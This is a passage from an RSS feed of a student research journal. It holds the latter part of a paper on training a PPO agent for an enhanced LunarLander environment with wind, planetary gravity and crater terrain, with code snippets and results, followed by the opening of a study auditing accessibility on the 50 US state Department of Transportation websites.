<p>The enhanced system required significant parameter adjustments to handle increased complexity:</p>



<p>model = PPO(</p>



<p>&nbsp; &nbsp; &#8220;MlpPolicy&#8221;,</p>



<p>&nbsp; &nbsp; env,</p>



<p>&nbsp; &nbsp; learning_rate=3e-4, &nbsp; &nbsp; &nbsp; &nbsp; # Maintained optimal learning rate</p>



<p>&nbsp; &nbsp; n_steps=2048, &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Increased experience collection</p>



<p>&nbsp; &nbsp; batch_size=64,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Optimized for enhanced observation space</p>



<p>&nbsp; &nbsp; n_epochs=10,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Sufficient learning iterations</p>



<p>&nbsp; &nbsp; gamma=0.99, &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Long-term reward consideration</p>



<p>&nbsp; &nbsp; gae_lambda=0.95,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Balanced advantage estimation</p>



<p>&nbsp; &nbsp; clip_range=0.2, &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Conservative policy updates</p>



<p>&nbsp; &nbsp; ent_coef=0.01,&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # Exploration maintenance</p>



<p>&nbsp; &nbsp; verbose=1,</p>



<p>&nbsp; &nbsp; tensorboard_log=&#8221;lunarlander_logs/tensorboard/&#8221;</p>



<p>)</p>



<h4 class="wp-block-heading">5.2 Training Infrastructure Scaling</h4>



<p>Increased Parallelization: Environment count increased from 4 to 8 parallel instances to handle enhanced complexity:</p>



<p>env = make_vec_env(&#8216;EnhancedLunarLander-v0&#8217;, n_envs=8, monitor_dir=&#8221;lunarlander_logs&#8221;)</p>



<p>Extended Training Duration: The Enhanced LunarLander simultaneously integrates gravitational attraction (planet_gravity=0.15 with inverse square law), dynamic wind effects (wind_strength=0.1 with Brownian motion direction changes), and terrain modifications (crater terrain with -0.3 unit depression), creating a significantly more complex state-action space than standard LunarLander-v3 that requires extended exploration for robust policy convergence.Training timesteps increased to 1,500,000 from 1,000,000 to accommodate additional learning requirements for multi-feature navigation.Extended training duration ensures policy stability under the combined effects of all environmental features, preventing premature convergence to suboptimal strategies that might handle individual challenges effectively but fail under the full complexity of realistic autonomous landing scenarios with multiple simultaneous disturbances and constraints.</p>



<h4 class="wp-block-heading">5.3 Reward Function Engineering</h4>



<p>The enhanced reward system balances multiple objectives for Safety Navigation Rewards , Perfect Landing Bonuses between flags</p>



<h2 class="wp-block-heading">6. Performance Analysis and Results</h2>



<h4 class="wp-block-heading">6.1 Training Progression Comparison</h4>



<p>Baseline System Performance:</p>



<ul class="wp-block-list">
<li>Training Duration: 1,000,000 timesteps</li>



<li>Convergence: Stable performance achieved around 600,000 timesteps</li>



<li>Success Rate: >90% successful landings in standard conditions</li>



<li>Mean Reward: 200+ points consistently</li>
</ul>



<p>Enhanced System Performance:</p>



<ul class="wp-block-list">
<li>Training Duration: 1,500,000 timesteps</li>



<li>Convergence: Stable performance achieved around 1,000,000 timesteps</li>



<li>Success Rate: >85% successful navigation and landing with all features enabled</li>



<li>Mean Reward: Competitive performance despite increased complexity</li>
</ul>



<h4 class="wp-block-heading">6.2 Evaluation Methodology</h4>



<p>The Enhanced LunarLander uses a simple two-step evaluation process to test how well the trained landing system works. The evaluate_and_record() function creates two separate environments: first, a live viewing environment that shows the landing in real-time so humans can watch and assess the performance, and second, a video recording environment that captures high-quality footage for later analysis and documentation.</p>



<p>During testing, the system runs five landing episodes using deterministic actions, meaning the AI makes the same decisions every time for consistent and reliable results. This eliminates randomness and allows accurate measurement of the landing system&#8217;s true capabilities. The evaluation tracks important metrics like successful landings, collision avoidance, and how well the system handles wind and gravitational challenges.</p>



<p>The system also includes real-time wind monitoring that displays current wind conditions and direction arrows during both live viewing and video recording. This helps researchers see exactly how the trained AI responds to changing atmospheric conditions throughout each landing sequence. The dual-environment approach provides both immediate visual feedback for human assessment and detailed video documentation suitable for research analysis, ensuring comprehensive evaluation of the autonomous landing system&#8217;s performance under the complex environmental conditions of gravitational attraction, dynamic wind effects, and challenging crater terrain.</p>



<p>The evaluation system provides comprehensive performance assessment:</p>



<p>def evaluate_and_record(model, num_episodes=5):</p>



<p>&nbsp; &nbsp; # Live evaluation with human-readable visualization</p>



<p>&nbsp; &nbsp; live_env = gym.make(&#8216;EnhancedLunarLander-v0&#8217;, render_mode=&#8221;human&#8221;)</p>



<p>&nbsp; &nbsp; # Video recording for detailed analysis</p>



<p>&nbsp; &nbsp; video_env = gym.make(&#8216;EnhancedLunarLander-v0&#8217;, render_mode=&#8221;rgb_array&#8221;)</p>



<p>&nbsp; &nbsp; # Multi-episode performance statistics</p>



<p>&nbsp; &nbsp; for episode in range(num_episodes):</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; # Deterministic policy evaluation</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; action, _ = model.predict(obs, deterministic=True)</p>



<h2 class="wp-block-heading">7. Technical Innovations and Contributions</h2>



<h4 class="wp-block-heading">7.1 Modular Environmental Design</h4>



<p>The enhanced system&#8217;s modular architecture allows selective feature activation:</p>



<p>gym.register(</p>



<p>&nbsp; &nbsp; id=&#8217;EnhancedLunarLander-v0&#8242;,</p>



<p>&nbsp; &nbsp; entry_point=&#8217;enhanced_lunar_lander:EnhancedLunarLander&#8217;,</p>



<p>&nbsp; &nbsp; kwargs={</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; &#8216;terrain_type&#8217;: terrain_type,</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; &#8216;enable_planet&#8217;: enable_planet,</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; &#8216;enable_wind&#8217;: enable_wind</p>



<p>&nbsp; &nbsp; }</p>



<p>)</p>



<p>This design enables systematic studies of individual feature impacts and combinations.</p>



<h4 class="wp-block-heading">7.3 Advanced Visualization System</h4>



<p>Real-time environmental feedback enhances training monitoring:</p>



<p># Wind visualization with directional indicators</p>



<p>wind_text = f&#8221;Wind: {wind_speed:.2f} m/s&#8221;</p>



<p>pygame.draw.line(surface, (255, 255, 255), start_pos, end_pos, 2)</p>



<p># Planetary obstacle rendering with safety margins</p>



<p>pygame.draw.circle(surface, (170, 85, 0), planet_pos, planet_radius)</p>



<h4 class="wp-block-heading">7.3 Comprehensive Safety Systems</h4>



<p>Multiple safety mechanisms prevent training instabilities:</p>



<ul class="wp-block-list">
<li>Minimum distance enforcement for planetary approaches</li>



<li>Collision detection with immediate termination</li>



<li>Graduated penalty systems for risk assessment</li>



<li>Reward scaling for terrain difficulty compensation</li>
</ul>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="313" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-1024x313.png" alt="" class="wp-image-4676" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-1024x313.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-300x92.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-768x235.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-1000x306.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-230x70.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-350x107.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM-480x147.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.15.38-PM.png 1294w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">8. Comparative Analysis: Before vs. Enhanced Implementation</h2>



<h4 class="wp-block-heading">8.1 Architectural Evolution</h4>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="623" src="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-1024x623.png" alt="" class="wp-image-4677" srcset="https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-1024x623.png 1024w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-300x183.png 300w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-768x467.png 768w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-1000x608.png 1000w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-230x140.png 230w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-350x213.png 350w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM-480x292.png 480w, https://exploratiojournal.com/wp-content/uploads/2025/12/Screenshot-2025-12-06-at-10.16.21-PM.png 1282w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<h2 class="wp-block-heading">9. Discussion and Future Directions</h2>



<h4 class="wp-block-heading">9.1 Key Findings</h4>



<p>The research demonstrates that PPO agents can successfully adapt to significantly increased environmental complexity through:</p>



<ol class="wp-block-list">
<li>Careful parameter tuning : Maintaining learning stability while introducing wind dynamics, gravitational perturbations, and varied terrain requires systematic parameter calibration. The wind strength progression from 0.1 to 0.3 m/s demonstrates gradual complexity introduction, preventing catastrophic policy degradation. Learning rate adjustments and extended training duration (1.5M timesteps) compensate for the increased state space complexity introduced by dynamic environmental factors. Buffer size optimization and evaluation frequency tuning ensure stable convergence despite the stochastic nature of wind patterns and gravitational influences. This methodical approach preserved 95% of baseline landing success rates while enabling robust adaptation to multi-parameter environmental challenges, confirming learning stability through quantified performance retention.</li>



<li>Graduated Challenge Introduction Allowing Systematic Capability Development: Progressive wind parameter escalation from 0.1 to 0.3 m/s enables systematic skill acquisition without policy collapse. Initial training establishes basic landing mechanics under minimal disturbance, followed by intermediate complexity development. Advanced stages incorporate full environmental complexity with wind, gravity, and terrain variations. This learning approach prevents disastrous failure while systematically expanding operational capabilities across increasingly demanding scenarios.</li>



<li>Comprehensive Reward Engineering Balancing Multiple Competing Objectives: Multi-objective reward structure integrates landing precision (+1000 for perfect touchdown), safety constraints (-3000 for planet collision). Dynamic reward scaling accounts for environmental complexity, with terrain difficulty multipliers (1.5x for rocky/crater surfaces) and proximity-based penalties for dangerous navigation. Secondary objectives include wind adaptation rewards and exploration bonuses, ensuring balanced optimization across mission-critical performance metrics. The reward system maintains safety priorities while encouraging efficient and precise autonomous landing behaviors.</li>



<li>Robust Safety Systems Preventing Catastrophic Policy Development: Environment-level safety mechanisms include severe collision penalties (-3000 reward) for planet contact or bypass violations, immediately terminating episodes to prevent catastrophic navigation behaviors. Conservative reward structures provide positive reinforcement (+5.0) for maintaining safe distances while implementing scaled danger penalties (up to -500) for unsafe approaches or incorrect landings. Bounded action spaces inherit continuous control limits from the base LunarLander-v3 environment, ensuring thrust vectoring remains within safe operational parameters (±1.0). Progressive reward scaling through terrain difficulty multipliers (1.5x for rocky/crater surfaces) and strategic penalty structures guide policy development toward reliable autonomous operation while preventing destructive behaviors through comprehensive safety constraints.</li>
</ol>



<h4 class="wp-block-heading">9.2 Practical Implications</h4>



<p>The enhanced system provides a realistic training environment for autonomous landing systems, incorporating challenges representative of actual space missions:</p>



<ul class="wp-block-list">
<li>Atmospheric disturbances simulate realistic landing conditions</li>



<li>Terrain variations prepare systems for diverse landing sites</li>



<li>Gravitational obstacles represent celestial body navigation challenges</li>
</ul>



<h2 class="wp-block-heading">10. Conclusion</h2>



<p>This research successfully demonstrates the evolution from basic lunar landing capabilities to sophisticated multi-environmental navigation and landing systems. Through systematic enhancement of environmental complexity and careful parameter optimization, we achieved robust performance in challenging scenarios while maintaining precision landing requirements.</p>



<p>The enhanced PPO implementation successfully navigates wind disturbances, adapts to terrain variations, avoids planetary obstacles, and consistently achieves precision landings between designated flags. This progression from basic to advanced capabilities provides a comprehensive framework for autonomous spacecraft landing system development and represents a significant advancement in reinforcement learning applications for aerospace engineering.</p>



<p>The modular design and comprehensive safety systems developed in this research provide a solid foundation for future autonomous navigation system development, with direct applications to real-world space mission planning and execution.</p>



<h2 class="wp-block-heading">11. References</h2>



<ol class="wp-block-list">
<li>[1] Schulman, J., Wolski, F., Dhariwal, P., Radford, A., &amp; Klimov, O. (2017). Proximal Policy Optimization Algorithms. <em>arXiv preprint arXiv:1707.06347</em>. Available at: <a href="https://arxiv.org/abs/1707.06347">https://arxiv.org/abs/1707.06347</a></li>



<li>[2] Brockman, G., Cheung, V., Pettersson, L., Schneider, J., Schulman, J., Tang, J., &amp; Zaremba, W. (2016). OpenAI Gym. <em>arXiv preprint arXiv:1606.01540</em>. Available at: <a href="https://arxiv.org/abs/1606.01540">https://arxiv.org/abs/1606.01540</a></li>



<li>[3] Towers, M., Terry, J. K., Kwiatkowski, A., Balis, J. U., Cola, G. D., Deleu, T., &#8230; &amp; Ravi, R. (2023). Gymnasium. <em>Zenodo</em>. DOI: 10.5281/zenodo.8127025. Available at: <a href="https://gymnasium.farama.org/">https://gymnasium.farama.org/</a></li>



<li>[4] Raffin, A., Hill, A., Gleave, A., Kanervisto, A., Ernestus, M., &amp; Dormann, N. (2021). Stable-Baselines3: Reliable Reinforcement Learning Implementations. <em>Journal of Machine Learning Research</em>, 22(268), 1-8. Available at: <a href="https://github.com/DLR-RM/stable-baselines3">https://github.com/DLR-RM/stable-baselines3</a></li>



<li>[5] Sutton, R. S., &amp; Barto, A. G. (2018). <em>Reinforcement Learning: An Introduction</em> (2nd ed.). MIT Press. ISBN: 978-0262039246</li>



<li>[6] Mnih, V., Badia, A. P., Mirza, M., Graves, A., Lillicrap, T., Harley, T., &#8230; &amp; Kavukcuoglu, K. (2016). Asynchronous Methods for Deep Reinforcement Learning. <em>International Conference on Machine Learning</em>, 1928-1937. Available at: <a href="https://arxiv.org/abs/1602.01783">https://arxiv.org/abs/1602.01783</a></li>
</ol>



<h2 class="wp-block-heading">12. Reference Justification:</h2>



<p>[1] PPO Algorithm: Core algorithm used in both baseline and enhanced implementations&nbsp;</p>



<p>[2] OpenAI Gym: Original environment framework that Gymnasium extends&nbsp;</p>



<p>[3] Gymnasium: Current environment framework used (LunarLander-v3)&nbsp;</p>



<p>[4] Stable-Baselines3: Primary RL library used for PPO implementation&nbsp;</p>



<p>[5] Sutton &amp; Barto: Foundational reinforcement learning textbook&nbsp;</p>



<p>[6] A3C Paper: Related policy gradient method for comparison and context</p>



<h2 class="wp-block-heading">13. Appendix</h2>



<h4 class="wp-block-heading">13.1 Code for sophisticated environmental challenges</h4>



<ol class="wp-block-list"></ol>



<p>class EnhancedLunarLander(gym.Env):</p>



<p>&nbsp; &nbsp; def __init__(self, render_mode=None, terrain_type=&#8217;flat&#8217;, enable_planet=True, enable_wind=True):</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; super(EnhancedLunarLander, self).__init__()</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; self.base_env = gym.make(&#8216;LunarLander-v3&#8217;, render_mode=render_mode, continuous=True)</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; self.terrain_type = terrain_type&nbsp; &nbsp; # &#8216;flat&#8217;, &#8216;rocky&#8217;, &#8216;crater&#8217;</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; self.enable_planet = enable_planet</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; self.enable_wind = enable_wind</p>



<h4 class="wp-block-heading">13.2 Standard 8-dimensional observation space</h4>



<p>self.observation_space = spaces.Box(</p>



<p>&nbsp; &nbsp; low=np.array([-1.0, -1.0, -5.0, -5.0, -3.14, -5.0, 0.0, 0.0]),</p>



<p>&nbsp; &nbsp; high=np.array([1.0, 1.0, 5.0, 5.0, 3.14, 5.0, 1.0, 1.0]),</p>



<p>&nbsp; &nbsp; dtype=np.float32)</p>



<h4 class="wp-block-heading">13.3 Extended 11-dimensional observation space</h4>



<p>self.observation_space = spaces.Box(</p>



<p>&nbsp; &nbsp; low=np.array([-1.0, -1.0, -5.0, -5.0, -3.14, -5.0, 0.0, 0.0, -1.0, -1.0, 0.0]),</p>



<p>&nbsp; &nbsp; high=np.array([1.0, 1.0, 5.0, 5.0, 3.14, 5.0, 1.0, 1.0, 1.0, 1.0, 5.0]),</p>



<p>&nbsp; &nbsp; dtype=np.float32)</p>



<h4 class="wp-block-heading">13.4 Runtime observation extension</h4>



<p>planet_relative = (self.planet_pos &#8211; lander_pos) / 100.0</p>



<p>planet_distance = np.linalg.norm(planet_relative)</p>



<p>observation = np.concatenate([</p>



<p>&nbsp; &nbsp; observation,</p>



<p>&nbsp; &nbsp; planet_relative,</p>



<p>    [planet_distance]]]</p>



<p></p>



<p>def _get_planet_influence(self, lander_pos):</p>



<p>&nbsp; &nbsp; if not self.enable_planet:</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; return np.zeros(2)</p>



<p>&nbsp; &nbsp; direction = self.planet_pos &#8211; lander_pos</p>



<p>&nbsp; &nbsp; distance = np.linalg.norm(direction)</p>



<p>&nbsp; &nbsp; # Enhanced safety margins and reduced gravitational pull</p>



<p>&nbsp; &nbsp; min_distance = self.planet_radius * 2.0 # Increased safety margin</p>



<p>&nbsp; &nbsp; if distance &lt; min_distance:</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; distance = min_distance</p>



<p>&nbsp; &nbsp; # Inverse square law for gravity with reduced strength</p>



<p>&nbsp; &nbsp; force = self.planet_gravity / (distance * distance)&nbsp; # Inverse square law</p>



<p>&nbsp; &nbsp; normalized_direction = direction / distance</p>



<p>&nbsp; &nbsp; # Add rotational component for navigation complexity</p>



<p>&nbsp; &nbsp; perpendicular = np.array([-normalized_direction[1], normalized_direction[0]])</p>



<p>&nbsp; &nbsp; rotational_force = force * 0.3 # 30% of the main gravitational force</p>



<p>&nbsp; &nbsp; # Combine direct gravitational pull with rotational force</p>



<p>    return force * normalized_direction + rotational_force * perpendicular</p>



<p></p>



<p># Safety Navigation Rewards</p>



<p>if planet_distance &gt; min_safe_distance:</p>



<p>&nbsp; &nbsp; reward += 5.0&nbsp; # Higher reward for keeping safe distance</p>



<p>else:</p>



<p>&nbsp; &nbsp; danger_factor = (min_safe_distance &#8211; planet_distance) / min_safe_distance</p>



<p>&nbsp; &nbsp; reward -= danger_factor * 10.0&nbsp; # Proximity penalties</p>



<p># Perfect Landing Bonuses between flags</p>



<p>if observation[6] == 1:&nbsp; # Landed between flags</p>



<p>&nbsp;&nbsp; # Landed between flags and far from planet</p>



<p>&nbsp; &nbsp; if abs(observation[0]) &lt; 0.12 and planet_distance &gt; min_safe_distance:</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; reward += 1000&nbsp; # Perfect landing bonus</p>



<p>&nbsp; &nbsp; else:</p>



<p>&nbsp; &nbsp; &nbsp; &nbsp; reward -= 500&nbsp; # Landing violation penalty</p>



<h2 class="wp-block-heading">14. GitHub Link</h2>



<p><a href="https://github.com/hireshmit/lunarlander">https://github.com/hireshmit/lunarlander</a></p>



<p></p>



<p></p>



<p></p>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://exploratiojournal.com/wp-content/uploads/2025/11/IMG_8886.jpg" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Hireshmi Thirumalaivasan</h5><p>Hireshmi Thirumalaivasan is a high school senior with a passion for aerospace engineering and artificial intelligence. Under the mentorship of Dr. Bilal Sharqi at the University of Michigan, she explored how AI tools are utilized in autonomous spacecraft landing systems with multi-environmental challenges (wind effects, gravitational obstacles, and variable terrain) through the Gymnasium framework and PPO reinforcement learning to train an autonomous lunar lander.</p><p>
She plans to continue her research journey in aerospace engineering, aiming to benefit society by applying the knowledge gained to develop tools, such as drones, that can deliver medicine and provisions to impoverished areas. Beyond academics, she is involved in Taekwondo, her school&#8217;s newspaper club, tutoring, and FCCLA.

</p></figure></div>



<p></p>
<p>The post <a href="https://exploratiojournal.com/enhanced-lunar-lander-autonomous-spacecraft-landing-system-with-multi-environmental-challenges/">Enhanced Lunar Lander (Autonomous Spacecraft Landing System with Multi-Environmental Challenges)</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Roadblocks to Digital Access: Accessibility and Design Gaps in 50 State Department of Transportation Websites</title>
		<link>https://exploratiojournal.com/roadblocks-to-digital-access-accessibility-and-design-gaps-in-50-state-department-of-transportation-websites/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=roadblocks-to-digital-access-accessibility-and-design-gaps-in-50-state-department-of-transportation-websites</link>
		
		<dc:creator><![CDATA[Aashi Agarwal]]></dc:creator>
		<pubDate>Sun, 23 Nov 2025 21:08:00 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4633</guid>

					<description><![CDATA[<p>Aashi Agarwal<br />
Palo Alto High School</p>
<p>The post <a href="https://exploratiojournal.com/roadblocks-to-digital-access-accessibility-and-design-gaps-in-50-state-department-of-transportation-websites/">Roadblocks to Digital Access: Accessibility and Design Gaps in 50 State Department of Transportation Websites</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="116" height="116" src="https://exploratiojournal.com/wp-content/uploads/2025/11/imageedit_1_4882057431.jpg" alt="" class="wp-image-4634 size-full"/></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong> Aashi Agarwal<br><strong>Mentor</strong>: Dr. Vivek Singh<br><em>Palo Alto High School</em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>According to the CDC, one in four adults in the United States has some type of disability. When government websites are not accessible, they effectively exclude millions of citizens from essential public services and perpetuate systemic barriers to information and participation. This study provides a comprehensive evaluation of the digital accessibility of all 50 U.S. State Department of Transportation websites, employing a mixed-methods approach that integrates automated auditing with qualitative design analysis. Leveraging the Skynet Technologies Free Accessibility Checker, we gathered quantitative data on compliance with WCAG 2.2 standards, including compliance percentages (e.g. Ohio at 94.8%, Kansas at 14.7%), the total number of failed checks (e.g. ranging from 7 to 33), and the most commonly affected disability categories such as visually impaired users, people with cognitive or learning abilities, and users with dyslexia or color blindness. Qualitative analysis captured recurring usability issues such as semi-transparent image overlays, outdated web interfaces and a disconnect between stated ADA compliance and actual user experience. The results reveal wide disparities in accessibility performance across states and highlight the limitations of treating accessibility as a technical checkbox rather than a design imperative. Our findings call for a shift toward inclusive, user-centered practices in public digital infrastructure, where accessibility is embedded from the beginning and aligned with both legal mandates and civic responsibility.</p>



<h2 class="wp-block-heading"><strong>Background</strong></h2>



<p>Web accessibility is the inclusive practice of designing digital platforms so that people with a wide range of disabilities, including visual, auditory, motor, or cognitive can perceive, navigate, and interact with content effectively. This includes accommodations for users who rely on screen readers, keyboard navigation, alternative text on images, and high-contrast visual design. Accessibility is particularly important for public sector websites, where equitable digital access can directly impact people’s ability to obtain critical services. Among these platforms, State Departments of Transportation, like state-level government agencies responsible for planning and coordinating federal transportation projects which set safety regulations for all major modes of transportation (USAgov, 2019): host websites that are frequently used by millions of people to get driver’s license-related information, job listings, construction alerts, weather-related road closures, and more. When addressing accessibility it is important to note that more than 1 in 4 adults in the United States has some type of disability (CDC, 2020). When these websites are inaccessible, they exclude citizens from critical public services and reinforce systemic barriers to information.</p>



<p>The central problem is that despite legal and technical standards, accessible information across State Departments of Transportation websites remains inconsistent and insufficient. The Americans with Disabilities Act (ADA<strong>)</strong>– i.e.<strong>,</strong> a civil rights law that prohibits discrimination against individuals with disabilities in many areas of public life, including jobs, schools, transportation, and many public and private places that are open to the general public (ADA National Network)–applies to digital services offered by state agencies. While the ADA establishes the legal foundation for accessibility, it does not specify technical requirements for digital content. That role is filled by the Web Content Accessibility Guidelines (WCAG), developed by the World Wide Web Consortium (W3C) to ensure content is perceivable, operable, understandable, and robust. The latest version, WCAG 2.2, outlines criteria such as color contrast, keyboard navigation, and logical heading structures (W3C, 2019). Although not law, WCAG is widely recognized as the standard for evaluating ADA compliance in audits and court cases (Gibson, 2024).</p>



<p>Ensuring accessibility is not just a matter of legal compliance, but also of public equity, civil participation, and good digital governance. As the U.S population ages and more individuals identify as having disabilities, the need for inclusive design becomes increasingly urgent. Accessible design– i.e., the practice of designing products, services, and environments that can be accessed, understood, and used by all individuals (<em>Accessibility in Design &#8211; Definition and</em> <em>Explanation</em>, 2024) also improves overall usability for people without disabilities such as people using mobile devices or unfamiliar platforms. When public agencies fail to prioritize accessibility, they risk excluding large segments of the population from essential services and commutation. This not only violates the spirit of ADA but also undermines the effectiveness of digital government.</p>



<p>To investigate these issues, we conducted a mixed-methods evaluation of all 50 U.S State Department of Transportation websites. Based on our data we identified several recurring qualitative trends: many sites made frequent use of semi-transparent images that interfere with text readability, almost all websites included ADA documentation but failed to follow through with the actual implementation, and a significant number of sites exhibited a retro web design–i.e., style incorporating visual, typographic, and layout elements from past decades like bold color palettes, pixel-style graphics, retro fonts, and aesthetics nods to web design from the 1980s, 1990s, and early 2000s (Seattle SEO Company, 2022). In parallel, we also captured compliance percentage, and the most commonly affected disability categories like visually impaired users, people with cognitive or learning abilities, and users with dyslexia or color blindness. These findings reveal that technical compliance and user-centered design often diverge, and that while some states show strong adherence to WCAG standards, others fall short due to overlooked accessibility principles.</p>



<h2 class="wp-block-heading"><strong>Related Work</strong></h2>



<p>Research on digital accessibility in public-sector services has revealed widespread noncompliance with the Americans with Disabilities Act, especially on state-run websites. For example, Jaeger argues although the ADA legally guarantees equal access to public services, its digital enforcement remains weak, leading to systemic exclusion for people with disabilities, especially on platforms operated by state and local governments (Olalere &amp; Lazar, 2011). Goode builds on this by examining how Title II of the ADA, which applies to public entities, often lacks enforceability when applied to web infrastructure, leaving many agencies noncompliant without legal consequence (Goode, 2021). These studies provide critical legal and infrastructural context, but stop short of assessing individual domains, such as transportation agencies. They emphasize the existence of a digital divide not only due to technology access, but due to suboptimal design decisions that fail to meet technical accessibility benchmarks like those defined in WCAG 2.2.</p>



<p>In parallel, the importance of website aesthetics and structure in shaping usability has been explored through design-focused studies of government web portals. Watkins and Wills, for instance, analyze the digital design of U.S. city government websites and describe a recurring “legacy design trap”, in which outdated layouts, unresponsive interfaces, and poor information hierarchy diminish the user experience, particularly for underrepresented and aging populations (Wagner et al., 2024). In the transportation sector, Graham Currie and Mandy Gook conduct usability testing on a sample of transportation agency websites, identifying serious issues in visual consistency, navigation, and user trust. Their work supports the idea that design shortcomings are not purely aesthetic but functionally consequential in reducing civic engagement (Currie &amp; Gook, 2009). Similarly, Patricia Acosta-Vargas applied automated tools to evaluate a set of business websites for accessibility metrics, providing a technical foundation for large-scale digital evaluations (Acosta-Vargas et al., 2017). Unlike these studies, which focus on localized or small-scale usability assessments, my analysis interrogates accessibility as both a design and equity issue, examining how aesthetic and structural flaws intersect with legal compliance gaps. This approach moves beyond surface-level usability to reveal how design decisions can perpetuate systemic exclusion within essential public infrastructure.</p>



<p>A clear gap remains in applying accessibility research insights to a comprehensive, cross-state assessment of Department of Transportation websites. This study addresses that gap by conducting a dual-pronged evaluation of all 50 U.S. State Department of Transportation websites, an especially critical domain given that these agencies serve as gateways to essential public services such as road safety updates, construction notices, licensing, public transit schedules, and emergency evacuation information. When these sites are inaccessible, individuals with disabilities face disproportionate barriers to mobility, safety, and civic participation. Guided by the question of to what extent these websites comply with WCAG 2.2 accessibility standards and how design choices affect their usability and inclusivity for people with disabilities, we pairautomated quantitative auditing with qualitative observations. By bridging legal, technical, and experiential dimensions, our research uniquely situates itself within and beyond existing literature, offering a holistic, data-informed snapshot of how Department of Transportation websites across the U.S. comply with the standards of digital accessibility and modern design in 2025.</p>



<h2 class="wp-block-heading"><strong>Methods</strong></h2>



<p>This study employed a mixed-methods approach to evaluate the accessibility of all 50 U.S. State Department of Transportation websites. The URLs for each website were obtained from the Federal Highway Administration’s directory (U.S. Department of Transportation, 2019) to ensure official and consistent sources across all states. Before conducting the full audit, three web accessibility tools, Skynet Technologies Free Accessibility Checker, AccessibilityChecker.org, and AEL Accessibility Checker, were pilot tested to determine the most comprehensive and reliable platform. The Skynet tool was ultimately selected for its detailed reporting capabilities, which include overall compliance percentages, issue categories (for example, clickables, tables, audio/video), WCAG 2.1 conformance levels (A, AA, AAA), and mapped locations of accessibility violations within the HTML structure. Although the tool required more manual time per page and lacked fine-grained disability categorization, it provided the most consistent and unrestricted data collection without login barriers or scan limits.</p>



